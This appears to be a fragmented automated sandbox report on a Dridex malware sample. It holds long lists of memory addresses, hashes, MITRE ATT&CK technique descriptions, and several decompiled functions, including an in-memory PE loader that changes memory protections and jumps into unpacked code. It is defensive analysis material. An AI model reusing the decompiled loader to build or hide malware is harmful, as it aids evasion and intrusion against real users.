0x00000000
0x70571bfd
0x70571c00
0x70571c02
0x70571c19
0x70571c19
0x70571c04
0x70571c08
0x70571c0d
0x70571c0d
0x70571c26
0x70571c29
0x70571c32
0x70571c35
0x70571c58
0x70571c5c
0x00000000
0x70571c5c
0x70571c3d
0x70571c3d
0x70571c49
0x70571c4c
0x70571c55
0x00000000
0x70571c55
0x70571bcb
0x70571bdb
0x70571bdb
0x70571bdd
0x00000000
0x00000000
0x70571bd3
0x70571bd5
0x70571bd5
0x00000000
0x70571bdb
0x70571b8b
0x70571b93
0x70571bb3
0x70571b95
0x70571b95
0x70571b9d
0x70571ba6
0x70571ba6
0x70571b9d
0x00000000
0x70571b93
0x70571b04
0x70571b0b
0x00000000
0x00000000
0x70571b18
0x70571b1e
0x70571b23
0x70571b2a
0x70571b2e
0x70571b43
0x70571b45
0x70571b47
0x70571b4d
0x70571b5b
0x70571b5b
0x70571b61
0x00000000
0x70571b61
0x00000000
0x00000000
0x00000000
0x00000000
0x70571aab
0x70571aab
0x70571aab
0x70571aac
0x70571aaf
0x70571ab3
0x00000000
0x70571ac9
0x70571acc
0x70571acf
0x70571ad8
0x70571adb
0x70571adc
0x70571ade
0x00000000
0x70571519
0x7057151b
0x70571520
0x7057152b
0x70571539
0x7057154c
0x70571559
0x70571562
0x70571566
0x7057156a
0x705715b2
0x705715b2
0x705715b4
0x705715bb
0x00000000
0x00000000
0x705715d4
0x705715dc
0x705715e0
0x705715f5
0x705715f9
0x705715fd
0x70571606
0x7057160c
0x7057160f
0x70571613
0x7057161b
0x7057161d
0x70571621
0x70571628
0x70571631
0x70571631
0x70571635
0x7057164a
0x70571660
0x7057166d
0x7057166e
0x7057166e
0x70571670
0x00000000
0x00000000
0x00000000
0x00000000
0x7057162a
0x7057162a
0x7057162a
0x7057162b
0x7057162c
0x00000000
0x7057162a
0x705715ef
0x705715f3
0x00000000
0x00000000
0x00000000
0x70571674
0x70571674
0x70571675
0x70571678
0x70571682
0x70571682
0x70571686
0x7057168d
0x705716e8
0x705716ed
0x70571740
0x70571740
0x70571744
0x70571748
0x70571572
0x70571575
0x7057157a
0x70571580
0x70571583
0x7057158a
0x7057158e
0x70571595
0x7057159e
0x705715a2
0x705715a6
0x705715ac
0x00000000
0x00000000
0x00000000
0x705715ac
0x70571752
0x7057175e
0x70571769
0x70571770
0x70571779
0x70571783
0x70571784
0x70571792
0x70571797
0x70571798
0x705717a5
0x705717aa
0x705717bc
0x705717c1
0x705717c6
0x705717d8
0x705717ea
0x705717ef
0x705717fa
0x70571801
0x70571806
0x7057180e
0x70571817
0x70571817
0x70571823
0x7057182a
0x70571836
0x70571842
0x70571850
0x70571861
0x70571868
0x7057186d
0x70571876
0x7057187b
0x7057187d
0x70571881
0x70571885
0x70571892
0x7057189f
0x705718a3
0x705718b7
0x705718bb
0x00000000
0x00000000
0x705718d0
0x705718d2
0x705718da
0x705718d7
0x705718d7
0x705718d7
0x705718de
0x705718e0
0x705718e6
0x705718ec
0x70571948
0x70571951
0x70571955
0x70571962
0x7057196b
0x70571970
0x70571974
0x70571977
0x705719d8
0x705719ee
0x705719f9
0x705719fa
0x705719fb
0x705719ff
0x70571a02
0x70571c82
0x70571c85
0x70571c85
0x00000000
0x70571a02
0x70571981
0x70571991
0x7057199a
0x705719a3
0x705719ac
0x705719ad
0x705719ae
0x705719b3
0x705719bb
0x705719c3
0x00000000
0x00000000
0x00000000
0x705719c5
0x705718f5
0x705718fa
0x705718fe
0x705718fe
0x70571902
0x70571905
0x00000000
0x00000000
0x70571926
0x70571928
0x7057192c
0x7057192e
0x00000000
0x00000000
0x70571930
0x70571937
0x70571943
0x00000000
0x70571943
0x7057190a
0x00000000
0x70571a08
0x70571a08
0x70571a09
0x70571a19
0x70571a25
0x70571a2e
0x70571a37
0x70571a40
0x00000000
0x70571a40
0x705716ef
0x705716f1
0x705716f3
0x705716f8
0x705716fd
0x70571710
0x70571726
0x7057172f
0x70571730
0x70571730
0x70571732
0x70571733
0x70571736
0x7057173a
0x00000000
0x705716f3
0x7057168f
0x70571699
0x7057169a
0x7057169a
0x705716a7
0x705716b3
0x705716b5
0x705716b7
0x705716bb
0x705716cb
0x705716cb
0x705716d2
0x705716d5
0x705716d6
0x705716da
0x705716e4
0x00000000
0x705716e4

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750bed595020aa8b54da01b25dcdab3227cdfcba6ceced2cd528a924f74ebbff
Instruction ID: 02fed057429856c59fb57f867793af116eb3a61ad3e9cb9be00d7391b678a4f5
Opcode Fuzzy Hash: 750bed595020aa8b54da01b25dcdab3227cdfcba6ceced2cd528a924f74ebbff
Instruction Fuzzy Hash: 1B3286705083409FC715DF68C885AAEBBF5EFD4700F10992EE49A8B3A1EB30E945DB52

Uniqueness

Uniqueness Score: -1.00%

Function 70566DC8, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E70566DC8() {

				 *0x7057d280 = GetUserNameW;
				 *0x7057D284 = MessageBoxW;
				 *0x7057D288 = GetLastError;
				 *0x7057D28C = CreateFileA;
				 *0x7057D290 = DebugBreak;
				 *0x7057D294 = FlushFileBuffers;
				 *0x7057D298 = FreeEnvironmentStringsA;
				 *0x7057D29C = GetConsoleOutputCP;
				 *0x7057D2A0 = GetEnvironmentStrings;
				 *0x7057D2A4 = GetLocaleInfoA;
				 *0x7057D2A8 = GetStartupInfoA;
				 *0x7057D2AC = GetStringTypeA;
				 *0x7057D2B0 = HeapValidate;
				 *0x7057D2B4 = IsBadReadPtr;
				 *0x7057D2B8 = LCMapStringA;
				 *0x7057D2BC = LoadLibraryA;
				 *0x7057D2C0 = OutputDebugStringA;
				return 0x7057d280;
			}

0x70566dd9
0x70566de1
0x70566de4
0x70566df3
0x70566df6
0x70566e05
0x70566e08
0x70566e17
0x70566e1a
0x70566e29
0x70566e2c
0x70566e3b
0x70566e3e
0x70566e4d
0x70566e50
0x70566e5f
0x70566e62
0x70566e65

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b9499ebf52779d4257e80689ceeec881f3e1d7370a740ecea43bc2be05b9649
Instruction ID: 39939e762eda676fb13393a34d658a3a639ae3718e51ed1a4499b9964c93bedc
Opcode Fuzzy Hash: 0b9499ebf52779d4257e80689ceeec881f3e1d7370a740ecea43bc2be05b9649
Instruction Fuzzy Hash: 0811DFB9A15600CF8348CF0AD998E517BF1BBEC311321A99AD8098B375D734A885EF54

Uniqueness

Uniqueness Score: -1.00%

Function 7056BC00, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E7056BC00(intOrPtr* __ecx) {
				void* _t1;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E7056C33C(__ecx);
				if(_t1 != 0) {
					L4:
					return _t1;
				} else {
					_t1 = E70572F8C(0xa5eabdf8, 0x2c2324e8);
					if(_t1 == 0) {
						 *_t4 = 0;
						goto L4;
					} else {
						_push( *_t4);
						asm("int3");
						return _t1;
					}
				}
			}

0x7056bc01
0x7056bc03
0x7056bc0a
0x7056bc29
0x7056bc2a
0x7056bc0c
0x7056bc16
0x7056bc1d
0x7056bc23
0x00000000
0x7056bc1f
0x7056bc1f
0x7056bc21
0x7056bc22
0x7056bc22
0x7056bc1d

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction ID: 3c682f3aff0bf5625ec93c561ba8c202c44361298cdd8a56afcf9bef742ee5a3
Opcode Fuzzy Hash: 229d0e70dd984517c4ff88a566391a3803afd3012da0cf9cedecb5fa3dd55369
Instruction Fuzzy Hash: 21D012721002436AFF251F39FE0171DEFA98FC1951F14485BA5016755ACFB689915020

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1112 Parent PID: 5928 rundll32.exeCOMMON

Executed Functions

Function 008E2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E008E2213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x8e4418 = 1;
				asm("movaps xmm0, [0x8e3010]");
				asm("movups [0x8e4428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E008E2569();
				E008E1D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E008E2569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x8e4418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E008E2569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x008e221f
0x008e222d
0x008e2234
0x008e2237
0x008e2241
0x008e2248
0x008e2252
0x008e2258
0x008e2261
0x008e226a
0x008e226d
0x008e2273
0x008e2277
0x008e227f
0x008e2283
0x008e2286
0x008e2289
0x008e228c
0x008e228f
0x008e22a9
0x008e22af
0x008e22b2
0x008e22ba
0x008e22be
0x008e22c1
0x008e22c4
0x008e22c7
0x008e22ca
0x008e22e6
0x008e2303
0x008e2328
0x008e232a
0x008e2333
0x008e2336
0x008e2340
0x008e2343
0x008e2346
0x008e2349
0x008e234c
0x008e23a4
0x008e23a4
0x008e254a
0x008e2550
0x008e244d
0x008e2453
0x008e249f
0x008e249f
0x008e24bc
0x008e24e2
0x008e24f0
0x008e24f3
0x008e24f7
0x008e24fb
0x008e2502
0x008e2508
0x008e250a
0x008e251c
0x008e2524
0x008e252a
0x008e2530
0x008e2536
0x00000000
0x00000000
0x008e253c
0x008e249f
0x008e245b
0x008e2469
0x008e2471
0x008e2474
0x008e2476
0x008e247c
0x008e2488
0x008e248e
0x008e2491
0x008e2494
0x008e238a
0x008e238a
0x008e23d8
0x008e23de
0x008e23e4
0x008e23ea
0x008e23f0
0x008e23f5
0x008e23fb
0x008e23fe
0x008e2401
0x008e2409
0x008e2411
0x008e2414
0x008e2417
0x008e241d
0x008e2423
0x008e242e
0x008e2362
0x008e2368
0x008e2368
0x008e23c5

APIs

VirtualProtect.KERNELBASE ref: 008E228F
VirtualProtect.KERNELBASE ref: 008E2328

Strings

t, xrefs: 008E2409

Memory Dump Source

Source File: 00000006.00000002.491155742.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 76f14f2b8039cc7696a28d9466172014838aa8ee2d7eea69135b6690f4471806
Instruction ID: ab7201b9d4c542bf5037ca069a2e0ed5c4feb9670a6a67038321e4e768784873
Opcode Fuzzy Hash: 76f14f2b8039cc7696a28d9466172014838aa8ee2d7eea69135b6690f4471806
Instruction Fuzzy Hash: 338199B4E042089FCB04CF99C580A9DFBF1FF88314F65856AE958AB361D734A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 008E2439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 008E2508

Memory Dump Source

Source File: 00000006.00000002.491155742.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7a71f95d4a664bed812e8af1f0fe9471208c92021cb9bbf3405642ad0d1f6e09
Instruction ID: 0f9fd82f552c8304221b373b5397c8f2139b29ce45c83cdcc9c0c0504c0dde98
Opcode Fuzzy Hash: 7a71f95d4a664bed812e8af1f0fe9471208c92021cb9bbf3405642ad0d1f6e09
Instruction Fuzzy Hash: 8531C5B5E002288FDB14CF69C98069DB7F1FF89304F268699D949A7346D731AE41CF81

Uniqueness

Uniqueness Score: -1.00%

Function 008E1D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 008E1EA8

Memory Dump Source

Source File: 00000006.00000002.491155742.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: e1fcd0edb6a13bbd8b1459cb24dc3cb8a363f69a7088519c2784226dd714b11a
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: 8741D3B5E0521A8FDB04DFA9C4946AEBBF1FF48714F15852EE848AB340D735A840CF95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report u3A1eWFqLE

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 5928 Parent PID: 5700

Function 705707CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Function 70561494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 7057218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 70572790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 70573060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 03152213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Function 70575DF0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Function 70571140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Function 70575720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 70575AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 70575B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Function 70575B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Function 70575B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Function 70575B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Function 70575B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Function 70575D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 705710CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 705755B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 70573564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Function 70569144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Function 7056A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 705684E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 705792DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 705714D8, Relevance: .6, Instructions: 572
COMMONCrypto

Function 70566DC8, Relevance: .0, Instructions: 36
COMMON

Function 7056BC00, Relevance: .0, Instructions: 16
COMMON

Function 008E2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON